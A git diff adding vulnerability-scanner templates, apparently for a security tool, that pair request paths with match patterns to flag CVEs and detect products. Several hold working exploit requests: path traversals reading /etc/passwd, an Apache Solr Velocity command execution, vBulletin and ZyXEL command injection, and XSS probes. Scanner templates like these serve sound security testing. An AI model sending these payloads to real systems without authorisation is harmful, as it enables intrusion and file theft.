diff --git a/templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh b/templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh new file mode 100644 index 0000000..22486e4 --- /dev/null +++ b/templates/active/ApPHP_MicroBlog_Remote_Code_Execution_Vulnerability.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='ApPHP MicroBlog Remote Code Execution Vulnerability' +URI='/index.php?b);phpinfo();echo(base64_decode('T3BlblZBUwo')=/' +METHOD='GET' +MATCH="phpinfo\(\)" +SEVERITY='P1 - CRITICAL' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Apache_Solr_Scanner.sh b/templates/active/Apache_Solr_Scanner.sh new file mode 100644 index 0000000..4fe906e --- /dev/null +++ b/templates/active/Apache_Solr_Scanner.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Apache Solr Detected' +URI='/' +METHOD='GET' +MATCH='<title>Solr Admin' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh b/templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh new file mode 100644 index 0000000..8f5636b --- /dev/null +++ b/templates/active/CVE-2018-13379_-_Fortigate_Pulse_Connect_Secure_Directory_Traversal.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2018-13379 - Fortigate Pulse Connect Secure Directory Traversal' +URI='/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession' +METHOD='GET' +MATCH='\.\.\.\.\.\.\.\.\.\.\.\.\.' +SEVERITY='P1 - CRITICAL' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh b/templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh new file mode 100644 index 0000000..b69ec7d --- /dev/null +++ b/templates/active/CVE-2019-11510_-_Pulse_Connect_Secure_SSL_VPN_Arbitrary_File_Read.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-11510 - Pulse Connect Secure SSL VPN Arbitrary File Read' +URI='/dana-na/../dana/html5acc/guacamole/../../../../../../etc/passwd?/dana/html5acc/guacamole/' +METHOD='GET' +MATCH='root\:' +SEVERITY='P1 - CRITICAL' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh b/templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh new file mode 100644 index 0000000..e95c255 --- /dev/null +++ b/templates/active/CVE-2019-11581_-_Jira_Template_Injection.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-11581 - Jira Template Injection' +URI='/secure/ContactAdministrators!default.jspa' +METHOD='GET' +MATCH='Contact Site Administrators' +SEVERITY='P1 - CRITICAL' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh b/templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh new file mode 100644 index 0000000..4497802 --- /dev/null +++ b/templates/active/CVE-2019-1653_-_Cisco_RV320_RV326_Configuration_Disclosure.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-1653 - Cisco RV320 RV326 Configuration Disclosure' +URI="/cgi-bin/config.exp" +METHOD='GET' +MATCH="sysconfig" +SEVERITY='P1 - CRITICAL' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh b/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh new file mode 100644 index 0000000..b40969a --- /dev/null +++ b/templates/active/CVE-2019-16759_-_vBulletin_5.x_0-Day_Pre-Auth_Remote_Command_Execution.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-16759 - vBulletin 5.x 0-Day Pre-Auth Remote Command Execution' +URI='/' +METHOD='POST' +MATCH='1337' +SEVERITY='P1 - CRITICAL' +CURL_OPTS="-d 'routestring=ajax%2Frender%2Fwidget_php&widgetConfig%5Bcode%5D=echo+shell_exec%28%27echo+$((1%2B1336))%27%29%3B+exit%3B' -H 'Content-Type: application/x-www-form-urlencoded' --user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh b/templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh new file mode 100644 index 0000000..93e4f2e --- /dev/null +++ b/templates/active/CVE-2019-17558_-_Apache_Solr_RCE.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-17558 - Apache Solr RCE' +URI='/solr/dovecot/select?q=1&&wt=velocity&v.template=custom&v.template.custom=%23set($x=%27%27)+%23set($rt=$x.class.forName(%27java.lang.Runtime%27))+%23set($chr=$x.class.forName(%27java.lang.Character%27))+%23set($str=$x.class.forName(%27java.lang.String%27))+%23set($ex=$rt.getRuntime().exec(%27cat%20/etc/passwd%27))+$ex.waitFor()+%23set($out=$ex.getInputStream())+%23foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))%23end' +METHOD='GET' +MATCH='root\:' +SEVERITY='P1 - CRITICAL' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh b/templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh new file mode 100644 index 0000000..804050e --- /dev/null +++ b/templates/active/CVE-2019-19781_-_Citrix_ADC_Directory_Traversal.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-19781 - Citrix ADC Directory Traversal' +URI='/vpn/../vpns/cfg/smb.conf' +METHOD='GET' +MATCH='\[global\]' +SEVERITY='P1 - CRITICAL' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh b/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh new file mode 100644 index 0000000..7f55747 --- /dev/null +++ b/templates/active/CVE-2019-19908_-_phpMyChat-Plus_XSS.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-19908 - phpMyChat-Plus XSS' +URI="/plus/pass_reset.php?L=english&pmc_username=%22%3E%3Cscript%3Ealert(1337)%3C/script%3E%3C" +METHOD='GET' +MATCH="" +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-5418_-_Rail_File_Content_Disclosure.sh b/templates/active/CVE-2019-5418_-_Rail_File_Content_Disclosure.sh new file mode 100644 index 0000000..84d9f51 --- /dev/null +++ b/templates/active/CVE-2019-5418_-_Rail_File_Content_Disclosure.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-5418 - File Content Disclosure on Rails' +URI="/../../../../../../../../etc/passwd\{\{" +METHOD='GET' +MATCH="root\:" +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-8451_Jira_SSRF_1.sh b/templates/active/CVE-2019-8451_Jira_SSRF_1.sh new file mode 100644 index 0000000..3c1b7d7 --- /dev/null +++ b/templates/active/CVE-2019-8451_Jira_SSRF_1.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-8451 Jira SSRF 1' +URI="/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" +METHOD='GET' +MATCH='Google' +SEVERITY='P3 - MEDIUM' +CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-8451_Jira_SSRF_2.sh b/templates/active/CVE-2019-8451_Jira_SSRF_2.sh new file mode 100644 index 0000000..5864795 --- /dev/null +++ b/templates/active/CVE-2019-8451_Jira_SSRF_2.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-8451 Jira SSRF 2' +URI="/jira/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" +METHOD='GET' +MATCH='Google' +SEVERITY='P3 - MEDIUM' +CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-8451_Jira_SSRF_3.sh b/templates/active/CVE-2019-8451_Jira_SSRF_3.sh new file mode 100644 index 0000000..3e98dff --- /dev/null +++ b/templates/active/CVE-2019-8451_Jira_SSRF_3.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-8451 Jira SSRF 3' +URI="/wiki/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" +METHOD='GET' +MATCH='Google' +SEVERITY='P3 - MEDIUM' +CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-8451_Jira_SSRF_4.sh b/templates/active/CVE-2019-8451_Jira_SSRF_4.sh new file mode 100644 index 0000000..cc4414d --- /dev/null +++ b/templates/active/CVE-2019-8451_Jira_SSRF_4.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-8451 Jira SSRF 4' +URI="/confluence/plugins/servlet/gadgets/makeRequest?url=https://127.0.0.1:443@google.com" +METHOD='GET' +MATCH='Google' +SEVERITY='P3 - MEDIUM' +CURL_OPTS='-L -H "X-Atlassian-Token: no-check --user-agent '' -s --insecure' +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-8903_-_Totaljs_Unathenticated_Directory_Traversal.sh b/templates/active/CVE-2019-8903_-_Totaljs_Unathenticated_Directory_Traversal.sh new file mode 100644 index 0000000..57b67c6 --- /dev/null +++ b/templates/active/CVE-2019-8903_-_Totaljs_Unathenticated_Directory_Traversal.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-8903 - Totaljs - Unathenticated Directory Traversal' +URI="/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/var/www/html/index.html" +METHOD='GET' +MATCH="apache2\.conf" +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh b/templates/active/CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh new file mode 100644 index 0000000..66b677b --- /dev/null +++ b/templates/active/CVE-2019-8982_-_Wavemaker_Studio_6.6_LFI_SSRF.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2019-8982 - Wavemaker Studio 6.6 LFI/SSRF' +URI="/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd" +METHOD='GET' +MATCH="root\:" +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-12271_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh b/templates/active/CVE-2020-12271_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh new file mode 100644 index 0000000..6d5e7c0 --- /dev/null +++ b/templates/active/CVE-2020-12271_-_Sophos_XG_Firewall_Pre-Auth_SQL_Injection.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-12271 - Sophos XG Firewall Pre-Auth SQL Injection' +URI='/userportal/webpages/myaccount/login.jsp' +METHOD='GET' +MATCH='loginstylesheet' +SEVERITY='P1 - CRITICAL' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh b/templates/active/CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh new file mode 100644 index 0000000..13a3892 --- /dev/null +++ b/templates/active/CVE-2020-2096_-_Jenkins_Gitlab_Hook_XSS.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-2096 - Jenkins Gitlab Hook XSS' +URI="/gitlab/build_now%3Csvg/onload=alert(1337)%3E" +METHOD='GET' +MATCH="" +SEVERITY='P3 - MEDIUM' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh b/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh new file mode 100644 index 0000000..f7c7ee0 --- /dev/null +++ b/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_1.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 1' +URI="/git/build_now/a'\">" +METHOD='GET' +MATCH="Gitlab Web Hook" +SEVERITY='P3 - MEDIUM' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh b/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh new file mode 100644 index 0000000..1287b29 --- /dev/null +++ b/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_2.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 2' +URI="/jenkins/git/build_now/a'\">" +METHOD='GET' +MATCH="Gitlab Web Hook" +SEVERITY='P3 - MEDIUM' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh b/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh new file mode 100644 index 0000000..9f27710 --- /dev/null +++ b/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_3.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 3' +URI="/gitlab/build_now/a'\">" +METHOD='GET' +MATCH="Gitlab Web Hook" +SEVERITY='P3 - MEDIUM' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh b/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh new file mode 100644 index 0000000..4d01daf --- /dev/null +++ b/templates/active/CVE-2020-2096_Jenkins_Gitlab_XSS_4.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-2096 Jenkins Gitlab XSS 4' +URI="/jenkins/gitlab/build_now/a'\">" +METHOD='GET' +MATCH="Gitlab Web Hook" +SEVERITY='P3 - MEDIUM' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-2555_-_WebLogic_Server_Deserialization_RCE.sh b/templates/active/CVE-2020-2555_-_WebLogic_Server_Deserialization_RCE.sh new file mode 100644 index 0000000..ceda435 --- /dev/null +++ b/templates/active/CVE-2020-2555_-_WebLogic_Server_Deserialization_RCE.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-2555 - WebLogic Server Deserialization RCE' +URI="/console/login/LoginForm.jsp" +METHOD='GET' +MATCH="WebLogic" +SEVERITY='P1 - CRITICAL' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh b/templates/active/CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh new file mode 100644 index 0000000..b128752 --- /dev/null +++ b/templates/active/CVE-2020-5284_-_Next_JS_Limited_Path_Traversal.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-5284 - Next JS Limited Path Traversal' +URI="/_next/static/../server/pages-manifest.json" +METHOD='GET' +MATCH='\{\"/_app\":\".*?_app\.js\"' +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-7246_-_qdPM_Authenticated_Remote_Code_Execution.sh b/templates/active/CVE-2020-7246_-_qdPM_Authenticated_Remote_Code_Execution.sh new file mode 100644 index 0000000..5332a91 --- /dev/null +++ b/templates/active/CVE-2020-7246_-_qdPM_Authenticated_Remote_Code_Execution.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-7246 - qdPM Authenticated Remote Code Execution' +URI="/" +METHOD='GET' +MATCH='qdPM 9.' +SEVERITY='P1 - CRITICAL' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-7473_Citrix_ShareFile_StorageZones.disabled b/templates/active/CVE-2020-7473_Citrix_ShareFile_StorageZones.disabled new file mode 100644 index 0000000..b72f4e3 --- /dev/null +++ b/templates/active/CVE-2020-7473_Citrix_ShareFile_StorageZones.disabled @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-7473 Citrix ShareFile StorageZones Unauthenticated Access' +URI="/UploadTest.aspx" +METHOD='GET' +MATCH="content\-length\:\ 0" +SEVERITY='P2 - HIGH' +CURL_OPTS='-L -I --user-agent '' -s --insecure' +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.disabled b/templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.disabled new file mode 100644 index 0000000..e0e8026 --- /dev/null +++ b/templates/active/CVE-2020-8115_-_Revive_Adserver_XSS.disabled @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-8115 - Revive Adserver XSS' +URI="/www/delivery/afr.php?refresh=10000&\")',10000000);alert(1337);setTimeout('alert(\"" +METHOD='GET' +MATCH='alert\(1337\)' +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/CVE-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh b/templates/active/CVE-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh new file mode 100644 index 0000000..76798e5 --- /dev/null +++ b/templates/active/CVE-2020-9054_-_ZyXEL_NAS_Remote_Code_Execution.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='CVE-2020-9054 - ZyXEL NAS Remote Code Execution' +URI="/cgi-bin/weblogin.cgi?username=admin';echo \$((1+1336))" +METHOD='GET' +MATCH="1337" +SEVERITY='P1 - CRITICAL' +CURL_OPTS="--user-agent '' -s --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Citrix-Access-Gateway_Detected.sh b/templates/active/Citrix-Access-Gateway_Detected.sh new file mode 100644 index 0000000..5fd8b5d --- /dev/null +++ b/templates/active/Citrix-Access-Gateway_Detected.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Citrix-Access-Gateway Detected' +URI='/vpn/index.html' +METHOD='GET' +MATCH='Netscaler Gateway' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Citrix_VPN_Scanner.sh b/templates/active/Citrix_VPN_Scanner.sh new file mode 100644 index 0000000..7700e66 --- /dev/null +++ b/templates/active/Citrix_VPN_Scanner.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Citrix VPN Detected' +URI='/vpn/index.html' +METHOD='GET' +MATCH='Gateway' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Clear-text_Communications_HTTP.sh b/templates/active/Clear-text_Communications_HTTP.sh new file mode 100644 index 0000000..8924b9f --- /dev/null +++ b/templates/active/Clear-text_Communications_HTTP.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Clear-Text Protocol - HTTP' +URI='/' +METHOD='GET' +MATCH='200 OK' +SEVERITY='P2 - HIGH' +CURL_OPTS="--user-agent '' -s" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Common_Status_File_Scanner_1.sh b/templates/active/Common_Status_File_Scanner_1.sh new file mode 100644 index 0000000..02babb6 --- /dev/null +++ b/templates/active/Common_Status_File_Scanner_1.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Common Status File Detected 1' +URI='/.perf' +METHOD='GET' +MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue" +SEVERITY='P4 - LOW' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Common_Status_File_Scanner_2.sh b/templates/active/Common_Status_File_Scanner_2.sh new file mode 100644 index 0000000..d680c01 --- /dev/null +++ b/templates/active/Common_Status_File_Scanner_2.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Common Status File Detected 2' +URI='/server-status' +METHOD='GET' +MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue" +SEVERITY='P4 - LOW' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Common_Status_File_Scanner_3.sh b/templates/active/Common_Status_File_Scanner_3.sh new file mode 100644 index 0000000..26a1fb6 --- /dev/null +++ b/templates/active/Common_Status_File_Scanner_3.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Common Status File Detected 3' +URI='/status.html' +METHOD='GET' +MATCH="Current\ Time|nginx\ vhost\ traffic|ConnectionQueue" +SEVERITY='P4 - LOW' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Confluence_Scanner.sh b/templates/active/Confluence_Scanner.sh new file mode 100644 index 0000000..3443813 --- /dev/null +++ b/templates/active/Confluence_Scanner.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Atlassian Confluence Detected' +URI='/' +METHOD='GET' +MATCH="Atlassian\ Confluence" +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Contact_Form_7_Wordpress_Plugin_Found_1.sh b/templates/active/Contact_Form_7_Wordpress_Plugin_Found_1.sh new file mode 100644 index 0000000..bf39f71 --- /dev/null +++ b/templates/active/Contact_Form_7_Wordpress_Plugin_Found_1.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Contact Form 7 Wordpress Plugin Found 1' +URI="/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt" +METHOD='GET' +MATCH='Contact Form 7' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Contact_Form_7_Wordpress_Plugin_Found_2.sh b/templates/active/Contact_Form_7_Wordpress_Plugin_Found_2.sh new file mode 100644 index 0000000..02e8586 --- /dev/null +++ b/templates/active/Contact_Form_7_Wordpress_Plugin_Found_2.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Contact Form 7 Wordpress Plugin Found 2' +URI="/wordpress/wp-content/plugins/drag-and-drop-multiple-file-upload-contact-form-7/readme.txt" +METHOD='GET' +MATCH='Contact Form 7' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Drupal_Scanner_1.sh b/templates/active/Drupal_Scanner_1.sh new file mode 100644 index 0000000..e613a4c --- /dev/null +++ b/templates/active/Drupal_Scanner_1.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Drupal Detected 1' +URI='/' +METHOD='GET' +MATCH="drupal\.org" +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Drupal_Scanner_2.sh b/templates/active/Drupal_Scanner_2.sh new file mode 100644 index 0000000..1082c31 --- /dev/null +++ b/templates/active/Drupal_Scanner_2.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Drupal Detected 3' +URI='/drupal/' +METHOD='GET' +MATCH="drupal\.org" +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Drupal_Scanner_3.sh b/templates/active/Drupal_Scanner_3.sh new file mode 100644 index 0000000..f68a0a2 --- /dev/null +++ b/templates/active/Drupal_Scanner_3.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Drupal Detected 2' +URI='/blog/' +METHOD='GET' +MATCH="drupal\.org" +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Drupal_User_Login.sh b/templates/active/Drupal_User_Login.sh new file mode 100644 index 0000000..0e3d052 --- /dev/null +++ b/templates/active/Drupal_User_Login.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Drupal User Login' +URI='/user/login?destination=/' +METHOD='GET' +MATCH='user-login-form' +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Drupal_Version_Disclosure.sh b/templates/active/Drupal_Version_Disclosure.sh new file mode 100644 index 0000000..467f84e --- /dev/null +++ b/templates/active/Drupal_Version_Disclosure.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Drupal Version Disclosure' +URI='/core/install.php?profile=default' +METHOD='GET' +MATCH='site-version' +SEVERITY='P4 - LOW' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git a/templates/active/Fortigate_Pulse_Connect_Secure_Scanner.sh b/templates/active/Fortigate_Pulse_Connect_Secure_Scanner.sh new file mode 100644 index 0000000..bee8245 --- /dev/null +++ b/templates/active/Fortigate_Pulse_Connect_Secure_Scanner.sh @@ -0,0 +1,9 @@ +AUTHOR='@xer0dayz' +VULN_NAME='Fortigate Pulse Connect Secure Detected' +URI='/remote/login?lang=en' +METHOD='GET' +MATCH="Please Login" +SEVERITY='P5 - INFO' +CURL_OPTS="--user-agent '' -s -L --insecure" +SECONDARY_COMMANDS='' +GREP_OPTIONS='-i' \ No newline at end of file diff --git 